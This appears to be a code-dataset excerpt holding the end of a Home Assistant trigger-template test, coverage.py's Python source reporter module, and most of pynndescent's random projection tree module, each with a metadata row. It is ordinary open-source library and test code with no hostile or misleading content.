'{{ trigger.%s }}' % '}} - {{ trigger.'.join((
'platform', 'entity_id', 'from_state.state',
'to_state.state'))
}}
],
}
})
self.hass.block_till_done()
self.calls = []
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.hass.states.set('test.entity', 'hello')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
self.assertEqual(
'template - test.entity - hello - world',
self.calls[0].data['some'])
| apache-2.0 | -4,656,855,175,723,286,000 | 32.967816 | 84 | 0.475636 | false |
testmana2/test | DebugClients/Python3/coverage/python.py | 18 | 5728 | # Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://bitbucket.org/ned/coveragepy/src/default/NOTICE.txt
"""Python source expertise for coverage.py"""
import os.path
import zipimport
from coverage import env, files
from coverage.misc import contract, expensive, NoSource, join_regex
from coverage.parser import PythonParser
from coverage.phystokens import source_token_lines, source_encoding
from coverage.plugin import FileReporter
@contract(returns='bytes')
def read_python_source(filename):
"""Read the Python source text from `filename`.
Returns bytes.
"""
with open(filename, "rb") as f:
return f.read().replace(b"\r\n", b"\n").replace(b"\r", b"\n")
@contract(returns='unicode')
def get_python_source(filename):
"""Return the source code, as unicode."""
base, ext = os.path.splitext(filename)
if ext == ".py" and env.WINDOWS:
exts = [".py", ".pyw"]
else:
exts = [ext]
for ext in exts:
try_filename = base + ext
if os.path.exists(try_filename):
# A regular text file: open it.
source = read_python_source(try_filename)
break
# Maybe it's in a zip file?
source = get_zip_bytes(try_filename)
if source is not None:
break
else:
# Couldn't find source.
raise NoSource("No source for code: '%s'." % filename)
source = source.decode(source_encoding(source), "replace")
# Python code should always end with a line with a newline.
if source and source[-1] != '\n':
source += '\n'
return source
@contract(returns='bytes|None')
def get_zip_bytes(filename):
"""Get data from `filename` if it is a zip file path.
Returns the bytestring data read from the zip file, or None if no zip file
could be found or `filename` isn't in it. The data returned will be
an empty string if the file is empty.
"""
markers = ['.zip'+os.sep, '.egg'+os.sep]
for marker in markers:
if marker in filename:
parts = filename.split(marker)
try:
zi = zipimport.zipimporter(parts[0]+marker[:-1])
except zipimport.ZipImportError:
continue
try:
data = zi.get_data(parts[1])
except IOError:
continue
return data
return None
class PythonFileReporter(FileReporter):
"""Report support for a Python file."""
def __init__(self, morf, coverage=None):
self.coverage = coverage
if hasattr(morf, '__file__'):
filename = morf.__file__
else:
filename = morf
# .pyc files should always refer to a .py instead.
if filename.endswith(('.pyc', '.pyo')):
filename = filename[:-1]
elif filename.endswith('$py.class'): # Jython
filename = filename[:-9] + ".py"
super(PythonFileReporter, self).__init__(files.canonical_filename(filename))
if hasattr(morf, '__name__'):
name = morf.__name__
name = name.replace(".", os.sep) + ".py"
else:
name = files.relative_filename(filename)
self.relname = name
self._source = None
self._parser = None
self._statements = None
self._excluded = None
def relative_filename(self):
return self.relname
@property
def parser(self):
"""Lazily create a :class:`PythonParser`."""
if self._parser is None:
self._parser = PythonParser(
filename=self.filename,
exclude=self.coverage._exclude_regex('exclude'),
)
return self._parser
@expensive
def lines(self):
"""Return the line numbers of statements in the file."""
if self._statements is None:
self._statements, self._excluded = self.parser.parse_source()
return self._statements
@expensive
def excluded_lines(self):
"""Return the line numbers of statements in the file."""
if self._excluded is None:
self._statements, self._excluded = self.parser.parse_source()
return self._excluded
def translate_lines(self, lines):
return self.parser.translate_lines(lines)
def translate_arcs(self, arcs):
return self.parser.translate_arcs(arcs)
@expensive
def no_branch_lines(self):
no_branch = self.parser.lines_matching(
join_regex(self.coverage.config.partial_list),
join_regex(self.coverage.config.partial_always_list)
)
return no_branch
@expensive
def arcs(self):
return self.parser.arcs()
@expensive
def exit_counts(self):
return self.parser.exit_counts()
@contract(returns='unicode')
def source(self):
if self._source is None:
self._source = get_python_source(self.filename)
return self._source
def should_be_python(self):
"""Does it seem like this file should contain Python?
This is used to decide if a file reported as part of the execution of
a program was really likely to have contained Python in the first
place.
"""
# Get the file extension.
_, ext = os.path.splitext(self.filename)
# Anything named *.py* should be Python.
if ext.startswith('.py'):
return True
# A file with no extension should be Python.
if not ext:
return True
# Everything else is probably not Python.
return False
def source_token_lines(self):
return source_token_lines(self.source())
| gpl-3.0 | -4,367,037,442,771,514,000 | 28.833333 | 84 | 0.598638 | false |
lmcinnes/pynndescent | pynndescent/rp_trees.py | 1 | 38378 | # Author: Leland McInnes <[email protected]>
#
# License: BSD 2 clause
from warnings import warn
import locale
import numpy as np
import numba
import scipy.sparse
from pynndescent.sparse import sparse_mul, sparse_diff, sparse_sum, arr_intersect
from pynndescent.utils import tau_rand_int, norm
import joblib
from collections import namedtuple
locale.setlocale(locale.LC_NUMERIC, "C")
# Used for a floating point "nearly zero" comparison
EPS = 1e-8
INT32_MIN = np.iinfo(np.int32).min + 1
INT32_MAX = np.iinfo(np.int32).max - 1
FlatTree = namedtuple(
"FlatTree", ["hyperplanes", "offsets", "children", "indices", "leaf_size"]
)
dense_hyperplane_type = numba.float32[::1]
sparse_hyperplane_type = numba.float64[:, ::1]
offset_type = numba.float64
children_type = numba.typeof((np.int32(-1), np.int32(-1)))
point_indices_type = numba.int32[::1]
@numba.njit(
numba.types.Tuple(
(numba.int32[::1], numba.int32[::1], dense_hyperplane_type, offset_type)
)(numba.float32[:, ::1], numba.int32[::1], numba.int64[::1]),
locals={
"n_left": numba.uint32,
"n_right": numba.uint32,
"hyperplane_vector": numba.float32[::1],
"hyperplane_offset": numba.float32,
"margin": numba.float32,
"d": numba.uint32,
"i": numba.uint32,
"left_index": numba.uint32,
"right_index": numba.uint32,
},
fastmath=True,
nogil=True,
cache=True,
)
def angular_random_projection_split(data, indices, rng_state):
"""Given a set of ``graph_indices`` for graph_data points from ``graph_data``, create
a random hyperplane to split the graph_data, returning two arrays graph_indices
that fall on either side of the hyperplane. This is the basis for a
random projection tree, which simply uses this splitting recursively.
This particular split uses cosine distance to determine the hyperplane
and which side each graph_data sample falls on.
Parameters
----------
data: array of shape (n_samples, n_features)
The original graph_data to be split
indices: array of shape (tree_node_size,)
The graph_indices of the elements in the ``graph_data`` array that are to
be split in the current operation.
rng_state: array of int64, shape (3,)
The internal state of the rng
Returns
-------
indices_left: array
The elements of ``graph_indices`` that fall on the "left" side of the
random hyperplane.
indices_right: array
The elements of ``graph_indices`` that fall on the "left" side of the
random hyperplane.
"""
dim = data.shape[1]
# Select two random points, set the hyperplane between them
left_index = tau_rand_int(rng_state) % indices.shape[0]
right_index = tau_rand_int(rng_state) % indices.shape[0]
right_index += left_index == right_index
right_index = right_index % indices.shape[0]
left = indices[left_index]
right = indices[right_index]
left_norm = norm(data[left])
right_norm = norm(data[right])
if abs(left_norm) < EPS:
left_norm = 1.0
if abs(right_norm) < EPS:
right_norm = 1.0
# Compute the normal vector to the hyperplane (the vector between
# the two points)
hyperplane_vector = np.empty(dim, dtype=np.float32)
for d in range(dim):
hyperplane_vector[d] = (data[left, d] / left_norm) - (
data[right, d] / right_norm
)
hyperplane_norm = norm(hyperplane_vector)
if abs(hyperplane_norm) < EPS:
hyperplane_norm = 1.0
for d in range(dim):
hyperplane_vector[d] = hyperplane_vector[d] / hyperplane_norm
# For each point compute the margin (project into normal vector)
# If we are on lower side of the hyperplane put in one pile, otherwise
# put it in the other pile (if we hit hyperplane on the nose, flip a coin)
n_left = 0
n_right = 0
side = np.empty(indices.shape[0], np.int8)
for i in range(indices.shape[0]):
margin = 0.0
for d in range(dim):
margin += hyperplane_vector[d] * data[indices[i], d]
if abs(margin) < EPS:
side[i] = tau_rand_int(rng_state) % 2
if side[i] == 0:
n_left += 1
else:
n_right += 1
elif margin > 0:
side[i] = 0
n_left += 1
else:
side[i] = 1
n_right += 1
# Now that we have the counts allocate arrays
indices_left = np.empty(n_left, dtype=np.int32)
indices_right = np.empty(n_right, dtype=np.int32)
# Populate the arrays with graph_indices according to which side they fell on
n_left = 0
n_right = 0
for i in range(side.shape[0]):
if side[i] == 0:
indices_left[n_left] = indices[i]
n_left += 1
else:
indices_right[n_right] = indices[i]
n_right += 1
return indices_left, indices_right, hyperplane_vector, 0.0
@numba.njit(
numba.types.Tuple(
(numba.int32[::1], numba.int32[::1], dense_hyperplane_type, offset_type)
)(numba.float32[:, ::1], numba.int32[::1], numba.int64[::1]),
locals={
"n_left": numba.uint32,
"n_right": numba.uint32,
"hyperplane_vector": numba.float32[::1],
"hyperplane_offset": numba.float32,
"margin": numba.float32,
"d": numba.uint32,
"i": numba.uint32,
"left_index": numba.uint32,
"right_index": numba.uint32,
},
fastmath=True,
nogil=True,
cache=True,
)
def euclidean_random_projection_split(data, indices, rng_state):
"""Given a set of ``graph_indices`` for graph_data points from ``graph_data``, create
a random hyperplane to split the graph_data, returning two arrays graph_indices
that fall on either side of the hyperplane. This is the basis for a
random projection tree, which simply uses this splitting recursively.
This particular split uses euclidean distance to determine the hyperplane
and which side each graph_data sample falls on.
Parameters
----------
data: array of shape (n_samples, n_features)
The original graph_data to be split
indices: array of shape (tree_node_size,)
The graph_indices of the elements in the ``graph_data`` array that are to
be split in the current operation.
rng_state: array of int64, shape (3,)
The internal state of the rng
Returns
-------
indices_left: array
The elements of ``graph_indices`` that fall on the "left" side of the
random hyperplane.
indices_right: array
The elements of ``graph_indices`` that fall on the "left" side of the
random hyperplane.
"""
dim = data.shape[1]
# Select two random points, set the hyperplane between them
left_index = tau_rand_int(rng_state) % indices.shape[0]
right_index = tau_rand_int(rng_state) % indices.shape[0]
right_index += left_index == right_index
right_index = right_index % indices.shape[0]
left = indices[left_index]
right = indices[right_index]
# Compute the normal vector to the hyperplane (the vector between
# the two points) and the offset from the origin
hyperplane_offset = 0.0
hyperplane_vector = np.empty(dim, dtype=np.float32)
for d in range(dim):
hyperplane_vector[d] = data[left, d] - data[right, d]
hyperplane_offset -= (
hyperplane_vector[d] * (data[left, d] + data[right, d]) / 2.0
)
# For each point compute the margin (project into normal vector, add offset)
# If we are on lower side of the hyperplane put in one pile, otherwise
# put it in the other pile (if we hit hyperplane on the nose, flip a coin)
n_left = 0
n_right = 0
side = np.empty(indices.shape[0], np.int8)
for i in range(indices.shape[0]):
margin = hyperplane_offset
for d in range(dim):
margin += hyperplane_vector[d] * data[indices[i], d]
if abs(margin) < EPS:
side[i] = abs(tau_rand_int(rng_state)) % 2
if side[i] == 0:
n_left += 1
else:
n_right += 1
elif margin > 0:
side[i] = 0
n_left += 1
else:
side[i] = 1
n_right += 1
# Now that we have the counts allocate arrays
indices_left = np.empty(n_left, dtype=np.int32)
indices_right = np.empty(n_right, dtype=np.int32)
# Populate the arrays with graph_indices according to which side they fell on
n_left = 0
n_right = 0
for i in range(side.shape[0]):
if side[i] == 0:
indices_left[n_left] = indices[i]
n_left += 1
else:
indices_right[n_right] = indices[i]
n_right += 1
return indices_left, indices_right, hyperplane_vector, hyperplane_offset
@numba.njit(
fastmath=True,
nogil=True,
cache=True,
locals={
"normalized_left_data": numba.types.float32[::1],
"normalized_right_data": numba.types.float32[::1],
"hyperplane_norm": numba.types.float32,
"i": numba.types.uint32,
},
)
def sparse_angular_random_projection_split(inds, indptr, data, indices, rng_state):
"""Given a set of ``graph_indices`` for graph_data points from a sparse graph_data set
presented in csr sparse format as inds, graph_indptr and graph_data, create
a random hyperplane to split the graph_data, returning two arrays graph_indices
that fall on either side of the hyperplane. This is the basis for a
random projection tree, which simply uses this splitting recursively.
This particular split uses cosine distance to determine the hyperplane
and which side each graph_data sample falls on.
Parameters
----------
inds: array
CSR format index array of the matrix
indptr: array
CSR format index pointer array of the matrix
data: array
CSR format graph_data array of the matrix
indices: array of shape (tree_node_size,)
The graph_indices of the elements in the ``graph_data`` array that are to
be split in the current operation.
rng_state: array of int64, shape (3,)
The internal state of the rng
Returns
-------
indices_left: array
The elements of ``graph_indices`` that fall on the "left" side of the
random hyperplane.
indices_right: array
The elements of ``graph_indices`` that fall on the "left" side of the
random hyperplane.
"""
# Select two random points, set the hyperplane between them
left_index = tau_rand_int(rng_state) % indices.shape[0]
right_index = tau_rand_int(rng_state) % indices.shape[0]
right_index += left_index == right_index
right_index = right_index % indices.shape[0]
left = indices[left_index]
right = indices[right_index]
left_inds = inds[indptr[left] : indptr[left + 1]]
left_data = data[indptr[left] : indptr[left + 1]]
right_inds = inds[indptr[right] : indptr[right + 1]]
right_data = data[indptr[right] : indptr[right + 1]]
left_norm = norm(left_data)
right_norm = norm(right_data)
if abs(left_norm) < EPS:
left_norm = 1.0
if abs(right_norm) < EPS:
right_norm = 1.0
# Compute the normal vector to the hyperplane (the vector between
# the two points)
normalized_left_data = (left_data / left_norm).astype(np.float32)
normalized_right_data = (right_data / right_norm).astype(np.float32)
hyperplane_inds, hyperplane_data = sparse_diff(
left_inds, normalized_left_data, right_inds, normalized_right_data
)
hyperplane_norm = norm(hyperplane_data)
if abs(hyperplane_norm) < EPS:
hyperplane_norm = 1.0
for d in range(hyperplane_data.shape[0]):
hyperplane_data[d] = hyperplane_data[d] / hyperplane_norm
# For each point compute the margin (project into normal vector)
# If we are on lower side of the hyperplane put in one pile, otherwise
# put it in the other pile (if we hit hyperplane on the nose, flip a coin)
n_left = 0
n_right = 0
side = np.empty(indices.shape[0], np.int8)
for i in range(indices.shape[0]):
margin = 0.0
i_inds = inds[indptr[indices[i]] : indptr[indices[i] + 1]]
i_data = data[indptr[indices[i]] : indptr[indices[i] + 1]]
_, mul_data = sparse_mul(hyperplane_inds, hyperplane_data, i_inds, i_data)
for val in mul_data:
margin += val
if abs(margin) < EPS:
side[i] = tau_rand_int(rng_state) % 2
if side[i] == 0:
n_left += 1
else:
n_right += 1
elif margin > 0:
side[i] = 0
n_left += 1
else:
side[i] = 1
n_right += 1
# Now that we have the counts allocate arrays
indices_left = np.empty(n_left, dtype=np.int32)
indices_right = np.empty(n_right, dtype=np.int32)
# Populate the arrays with graph_indices according to which side they fell on
n_left = 0
n_right = 0
for i in range(side.shape[0]):
if side[i] == 0:
indices_left[n_left] = indices[i]
n_left += 1
else:
indices_right[n_right] = indices[i]
n_right += 1
hyperplane = np.vstack((hyperplane_inds, hyperplane_data))
return indices_left, indices_right, hyperplane, 0.0
@numba.njit(fastmath=True, nogil=True, cache=True)
def sparse_euclidean_random_projection_split(inds, indptr, data, indices, rng_state):
"""Given a set of ``graph_indices`` for graph_data points from a sparse graph_data set
presented in csr sparse format as inds, graph_indptr and graph_data, create
a random hyperplane to split the graph_data, returning two arrays graph_indices
that fall on either side of the hyperplane. This is the basis for a
random projection tree, which simply uses this splitting recursively.
This particular split uses cosine distance to determine the hyperplane
and which side each graph_data sample falls on.
Parameters
----------
inds: array
CSR format index array of the matrix
indptr: array
CSR format index pointer array of the matrix
data: array
CSR format graph_data array of the matrix
indices: array of shape (tree_node_size,)
The graph_indices of the elements in the ``graph_data`` array that are to
be split in the current operation.
rng_state: array of int64, shape (3,)
The internal state of the rng
Returns
-------
indices_left: array
The elements of ``graph_indices`` that fall on the "left" side of the
random hyperplane.
indices_right: array
The elements of ``graph_indices`` that fall on the "left" side of the
random hyperplane.
"""
# Select two random points, set the hyperplane between them
left_index = np.abs(tau_rand_int(rng_state)) % indices.shape[0]
right_index = np.abs(tau_rand_int(rng_state)) % indices.shape[0]
right_index += left_index == right_index
right_index = right_index % indices.shape[0]
left = indices[left_index]
right = indices[right_index]
left_inds = inds[indptr[left] : indptr[left + 1]]
left_data = data[indptr[left] : indptr[left + 1]]
right_inds = inds[indptr[right] : indptr[right + 1]]
right_data = data[indptr[right] : indptr[right + 1]]
# Compute the normal vector to the hyperplane (the vector between
# the two points) and the offset from the origin
hyperplane_offset = 0.0
hyperplane_inds, hyperplane_data = sparse_diff(
left_inds, left_data, right_inds, right_data
)
offset_inds, offset_data = sparse_sum(left_inds, left_data, right_inds, right_data)
offset_data = offset_data / 2.0
offset_inds, offset_data = sparse_mul(
hyperplane_inds, hyperplane_data, offset_inds, offset_data.astype(np.float32)
)
for val in offset_data:
hyperplane_offset -= val
# For each point compute the margin (project into normal vector, add offset)
# If we are on lower side of the hyperplane put in one pile, otherwise
# put it in the other pile (if we hit hyperplane on the nose, flip a coin)
n_left = 0
n_right = 0
side = np.empty(indices.shape[0], np.int8)
for i in range(indices.shape[0]):
margin = hyperplane_offset
i_inds = inds[indptr[indices[i]] : indptr[indices[i] + 1]]
i_data = data[indptr[indices[i]] : indptr[indices[i] + 1]]
_, mul_data = sparse_mul(hyperplane_inds, hyperplane_data, i_inds, i_data)
for val in mul_data:
margin += val
if abs(margin) < EPS:
side[i] = abs(tau_rand_int(rng_state)) % 2
if side[i] == 0:
n_left += 1
else:
n_right += 1
elif margin > 0:
side[i] = 0
n_left += 1
else:
side[i] = 1
n_right += 1
# Now that we have the counts allocate arrays
indices_left = np.empty(n_left, dtype=np.int32)
indices_right = np.empty(n_right, dtype=np.int32)
# Populate the arrays with graph_indices according to which side they fell on
n_left = 0
n_right = 0
for i in range(side.shape[0]):
if side[i] == 0:
indices_left[n_left] = indices[i]
n_left += 1
else:
indices_right[n_right] = indices[i]
n_right += 1
hyperplane = np.vstack((hyperplane_inds, hyperplane_data))
return indices_left, indices_right, hyperplane, hyperplane_offset
@numba.njit(
nogil=True,
cache=True,
locals={"left_node_num": numba.types.int32, "right_node_num": numba.types.int32},
)
def make_euclidean_tree(
data,
indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size=30,
):
if indices.shape[0] > leaf_size:
(
left_indices,
right_indices,
hyperplane,
offset,
) = euclidean_random_projection_split(data, indices, rng_state)
make_euclidean_tree(
data,
left_indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
left_node_num = len(point_indices) - 1
make_euclidean_tree(
data,
right_indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
right_node_num = len(point_indices) - 1
hyperplanes.append(hyperplane)
offsets.append(offset)
children.append((np.int32(left_node_num), np.int32(right_node_num)))
point_indices.append(np.array([-1], dtype=np.int32))
else:
hyperplanes.append(np.array([-1.0], dtype=np.float32))
offsets.append(-np.inf)
children.append((np.int32(-1), np.int32(-1)))
point_indices.append(indices)
return
@numba.njit(
nogil=True,
cache=True,
locals={
"children": numba.types.ListType(children_type),
"left_node_num": numba.types.int32,
"right_node_num": numba.types.int32,
},
)
def make_angular_tree(
data,
indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size=30,
):
if indices.shape[0] > leaf_size:
(
left_indices,
right_indices,
hyperplane,
offset,
) = angular_random_projection_split(data, indices, rng_state)
make_angular_tree(
data,
left_indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
left_node_num = len(point_indices) - 1
make_angular_tree(
data,
right_indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
right_node_num = len(point_indices) - 1
hyperplanes.append(hyperplane)
offsets.append(offset)
children.append((np.int32(left_node_num), np.int32(right_node_num)))
point_indices.append(np.array([-1], dtype=np.int32))
else:
hyperplanes.append(np.array([-1.0], dtype=np.float32))
offsets.append(-np.inf)
children.append((np.int32(-1), np.int32(-1)))
point_indices.append(indices)
return
@numba.njit(
nogil=True,
cache=True,
locals={"left_node_num": numba.types.int32, "right_node_num": numba.types.int32},
)
def make_sparse_euclidean_tree(
inds,
indptr,
data,
indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size=30,
):
if indices.shape[0] > leaf_size:
(
left_indices,
right_indices,
hyperplane,
offset,
) = sparse_euclidean_random_projection_split(
inds, indptr, data, indices, rng_state
)
make_sparse_euclidean_tree(
inds,
indptr,
data,
left_indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
left_node_num = len(point_indices) - 1
make_sparse_euclidean_tree(
inds,
indptr,
data,
right_indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
right_node_num = len(point_indices) - 1
hyperplanes.append(hyperplane)
offsets.append(offset)
children.append((np.int32(left_node_num), np.int32(right_node_num)))
point_indices.append(np.array([-1], dtype=np.int32))
else:
hyperplanes.append(np.array([[-1.0], [-1.0]], dtype=np.float64))
offsets.append(-np.inf)
children.append((np.int32(-1), np.int32(-1)))
point_indices.append(indices)
return
@numba.njit(
nogil=True,
cache=True,
locals={"left_node_num": numba.types.int32, "right_node_num": numba.types.int32},
)
def make_sparse_angular_tree(
inds,
indptr,
data,
indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size=30,
):
if indices.shape[0] > leaf_size:
(
left_indices,
right_indices,
hyperplane,
offset,
) = sparse_angular_random_projection_split(
inds, indptr, data, indices, rng_state
)
make_sparse_angular_tree(
inds,
indptr,
data,
left_indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
left_node_num = len(point_indices) - 1
make_sparse_angular_tree(
inds,
indptr,
data,
right_indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
right_node_num = len(point_indices) - 1
hyperplanes.append(hyperplane)
offsets.append(offset)
children.append((np.int32(left_node_num), np.int32(right_node_num)))
point_indices.append(np.array([-1], dtype=np.int32))
else:
hyperplanes.append(np.array([[-1.0], [-1.0]], dtype=np.float64))
offsets.append(-np.inf)
children.append((np.int32(-1), np.int32(-1)))
point_indices.append(indices)
@numba.njit(nogil=True, cache=True)
def make_dense_tree(data, rng_state, leaf_size=30, angular=False):
indices = np.arange(data.shape[0]).astype(np.int32)
hyperplanes = numba.typed.List.empty_list(dense_hyperplane_type)
offsets = numba.typed.List.empty_list(offset_type)
children = numba.typed.List.empty_list(children_type)
point_indices = numba.typed.List.empty_list(point_indices_type)
if angular:
make_angular_tree(
data,
indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
else:
make_euclidean_tree(
data,
indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
# print("Completed a tree")
result = FlatTree(hyperplanes, offsets, children, point_indices, leaf_size)
# print("Tree type is:", numba.typeof(result))
return result
@numba.njit(nogil=True, cache=True)
def make_sparse_tree(inds, indptr, spdata, rng_state, leaf_size=30, angular=False):
indices = np.arange(indptr.shape[0] - 1).astype(np.int32)
hyperplanes = numba.typed.List.empty_list(sparse_hyperplane_type)
offsets = numba.typed.List.empty_list(offset_type)
children = numba.typed.List.empty_list(children_type)
point_indices = numba.typed.List.empty_list(point_indices_type)
if angular:
make_sparse_angular_tree(
inds,
indptr,
spdata,
indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
else:
make_sparse_euclidean_tree(
inds,
indptr,
spdata,
indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
return FlatTree(hyperplanes, offsets, children, point_indices, leaf_size)
@numba.njit(
[
"b1(f4[::1],f4,f4[::1],i8[::1])",
numba.types.boolean(
numba.types.Array(numba.types.float32, 1, "C", readonly=True),
numba.types.float32,
numba.types.Array(numba.types.float32, 1, "C", readonly=True),
numba.types.Array(numba.types.int64, 1, "C", readonly=False),
),
],
fastmath=True,
locals={
"margin": numba.types.float32,
"dim": numba.types.intp,
"d": numba.types.uint16,
},
cache=True,
)
def select_side(hyperplane, offset, point, rng_state):
margin = offset
dim = point.shape[0]
for d in range(dim):
margin += hyperplane[d] * point[d]
if abs(margin) < EPS:
side = np.abs(tau_rand_int(rng_state)) % 2
if side == 0:
return 0
else:
return 1
elif margin > 0:
return 0
else:
return 1
@numba.njit(
[
"i4[::1](f4[::1],f4[:,::1],f4[::1],i4[:,::1],i4[::1],i8[::1])",
numba.types.Array(numba.types.int32, 1, "C", readonly=True)(
numba.types.Array(numba.types.float32, 1, "C", readonly=True),
numba.types.Array(numba.types.float32, 2, "C", readonly=True),
numba.types.Array(numba.types.float32, 1, "C", readonly=True),
numba.types.Array(numba.types.int32, 2, "C", readonly=True),
numba.types.Array(numba.types.int32, 1, "C", readonly=True),
numba.types.Array(numba.types.int64, 1, "C", readonly=False),
),
],
locals={"node": numba.types.uint32, "side": numba.types.boolean},
cache=True,
)
def search_flat_tree(point, hyperplanes, offsets, children, indices, rng_state):
node = 0
while children[node, 0] > 0:
side = select_side(hyperplanes[node], offsets[node], point, rng_state)
if side == 0:
node = children[node, 0]
else:
node = children[node, 1]
return indices[-children[node, 0] : -children[node, 1]]
@numba.njit(fastmath=True, cache=True)
def sparse_select_side(hyperplane, offset, point_inds, point_data, rng_state):
margin = offset
hyperplane_size = hyperplane.shape[1]
while hyperplane[0, hyperplane_size - 1] < 0.0:
hyperplane_size -= 1
hyperplane_inds = hyperplane[0, :hyperplane_size].astype(np.int32)
hyperplane_data = hyperplane[1, :hyperplane_size]
_, aux_data = sparse_mul(hyperplane_inds, hyperplane_data, point_inds, point_data)
for val in aux_data:
margin += val
if abs(margin) < EPS:
side = tau_rand_int(rng_state) % 2
if side == 0:
return 0
else:
return 1
elif margin > 0:
return 0
else:
return 1
@numba.njit(locals={"node": numba.types.uint32}, cache=True)
def search_sparse_flat_tree(
point_inds, point_data, hyperplanes, offsets, children, indices, rng_state
):
node = 0
while children[node, 0] > 0:
side = sparse_select_side(
hyperplanes[node], offsets[node], point_inds, point_data, rng_state
)
if side == 0:
node = children[node, 0]
else:
node = children[node, 1]
return indices[-children[node, 0] : -children[node, 1]]
def make_forest(
data,
n_neighbors,
n_trees,
leaf_size,
rng_state,
random_state,
n_jobs=None,
angular=False,
):
"""Build a random projection forest with ``n_trees``.
Parameters
----------
data
n_neighbors
n_trees
leaf_size
rng_state
angular
Returns
-------
forest: list
A list of random projection trees.
"""
# print(ts(), "Started forest construction")
result = []
if leaf_size is None:
leaf_size = max(10, n_neighbors)
if n_jobs is None:
n_jobs = -1
rng_states = random_state.randint(INT32_MIN, INT32_MAX, size=(n_trees, 3)).astype(
np.int64
)
try:
if scipy.sparse.isspmatrix_csr(data):
result = joblib.Parallel(n_jobs=n_jobs, require="sharedmem")(
joblib.delayed(make_sparse_tree)(
data.indices,
data.indptr,
data.data,
rng_states[i],
leaf_size,
angular,
)
for i in range(n_trees)
)
else:
result = joblib.Parallel(n_jobs=n_jobs, require="sharedmem")(
joblib.delayed(make_dense_tree)(data, rng_states[i], leaf_size, angular)
for i in range(n_trees)
)
except (RuntimeError, RecursionError, SystemError):
warn(
"Random Projection forest initialisation failed due to recursion"
"limit being reached. Something is a little strange with your "
"graph_data, and this may take longer than normal to compute."
)
return tuple(result)
@numba.njit(nogil=True, cache=True)
def get_leaves_from_tree(tree):
n_leaves = 0
for i in range(len(tree.children)):
if tree.children[i][0] == -1 and tree.children[i][1] == -1:
n_leaves += 1
result = np.full((n_leaves, tree.leaf_size), -1, dtype=np.int32)
leaf_index = 0
for i in range(len(tree.indices)):
if tree.children[i][0] == -1 or tree.children[i][1] == -1:
leaf_size = tree.indices[i].shape[0]
result[leaf_index, :leaf_size] = tree.indices[i]
leaf_index += 1
return result
def rptree_leaf_array_parallel(rp_forest):
result = joblib.Parallel(n_jobs=-1, require="sharedmem")(
joblib.delayed(get_leaves_from_tree)(rp_tree) for rp_tree in rp_forest
)
return result
def rptree_leaf_array(rp_forest):
if len(rp_forest) > 0:
return np.vstack(rptree_leaf_array_parallel(rp_forest))
else:
return np.array([[-1]])
@numba.njit()
def recursive_convert(
tree, hyperplanes, offsets, children, indices, node_num, leaf_start, tree_node
):
if tree.children[tree_node][0] < 0:
leaf_end = leaf_start + len(tree.indices[tree_node])
children[node_num, 0] = -leaf_start
children[node_num, 1] = -leaf_end
indices[leaf_start:leaf_end] = tree.indices[tree_node]
return node_num, leaf_end
else:
hyperplanes[node_num] = tree.hyperplanes[tree_node]
offsets[node_num] = tree.offsets[tree_node]
children[node_num, 0] = node_num + 1
old_node_num = node_num
node_num, leaf_start = recursive_convert(
tree,
hyperplanes,
offsets,
children,
indices,
node_num + 1,
leaf_start,
tree.children[tree_node][0],
)
children[old_node_num, 1] = node_num + 1
node_num, leaf_start = recursive_convert(
tree,
hyperplanes,
offsets,
children,
indices,
node_num + 1,
leaf_start,
tree.children[tree_node][1],
)
return node_num, leaf_start
@numba.njit()
def recursive_convert_sparse(
tree, hyperplanes, offsets, children, indices, node_num, leaf_start, tree_node
):
if tree.children[tree_node][0] < 0:
leaf_end = leaf_start + len(tree.indices[tree_node])
children[node_num, 0] = -leaf_start
children[node_num, 1] = -leaf_end
indices[leaf_start:leaf_end] = tree.indices[tree_node]
return node_num, leaf_end
else:
hyperplanes[
node_num, :, : tree.hyperplanes[tree_node].shape[1]
] = tree.hyperplanes[tree_node]
offsets[node_num] = tree.offsets[tree_node]
children[node_num, 0] = node_num + 1
old_node_num = node_num
node_num, leaf_start = recursive_convert_sparse(
tree,
hyperplanes,
offsets,
children,
indices,
node_num + 1,
leaf_start,
tree.children[tree_node][0],
)
children[old_node_num, 1] = node_num + 1
node_num, leaf_start = recursive_convert_sparse(
tree,
hyperplanes,
offsets,
children,
indices,
node_num + 1,
leaf_start,
tree.children[tree_node][1],
)
return node_num, leaf_start
@numba.njit(cache=True)
def num_nodes_and_leaves(tree):
n_nodes = 0
n_leaves = 0
for i in range(len(tree.children)):
if tree.children[i][0] < 0:
n_leaves += 1
n_nodes += 1
else:
n_nodes += 1
return n_nodes, n_leaves
@numba.njit(cache=True)
def dense_hyperplane_dim(hyperplanes):
for i in range(len(hyperplanes)):
if hyperplanes[i].shape[0] > 1:
return hyperplanes[i].shape[0]
raise ValueError("No hyperplanes of adequate size were found!")
@numba.njit(cache=True)
def sparse_hyperplane_dim(hyperplanes):
max_dim = 0
for i in range(len(hyperplanes)):
if hyperplanes[i].shape[1] > max_dim:
max_dim = hyperplanes[i].shape[1]
return max_dim
def convert_tree_format(tree, data_size):
n_nodes, n_leaves = num_nodes_and_leaves(tree)
is_sparse = False
if tree.hyperplanes[0].ndim == 1:
# dense hyperplanes
hyperplane_dim = dense_hyperplane_dim(tree.hyperplanes)
